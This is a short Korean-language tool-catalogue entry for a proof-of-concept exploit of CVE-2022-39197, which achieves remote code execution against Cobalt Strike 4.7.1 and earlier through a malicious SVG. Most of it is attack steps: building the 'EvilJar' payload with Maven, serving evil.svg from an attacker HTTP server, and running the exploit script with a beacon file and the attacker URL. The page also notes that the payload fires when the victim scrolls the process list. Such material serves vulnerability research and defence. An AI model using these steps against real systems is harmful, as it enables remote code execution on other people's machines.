해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!
CVE-2022-39197에 대한 개념 증명 익스플로잇으로, HTTP를 통해 제공되는 악성 SVG 페이로드를 이용해 CobaltStrike <= 4.7.1에 대한 원격 코드 실행을 가능하게 합니다.
커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.
모든 도구 탐색
도구 컬렉션을 둘러보세요
EvilJar/src/main/java/Exploit.java
Line 19
mvn clean compile assembly:single
EvilJar/target/
serve/
EvilJar-1.0-jar-with-dependencies.jar
serve\evil.svg
[attacker]
python3 -m http.server 8080
python3 cve-2022-39197.py beacon.exe http://10.10.10.2:8080/evil.svg
페이로드는 사용자가 프로세스 목록을 스크롤하는 즉시 트리거됩니다.
https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — 이 취약점에 대한 훌륭한 심층 분석이 있습니다. https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html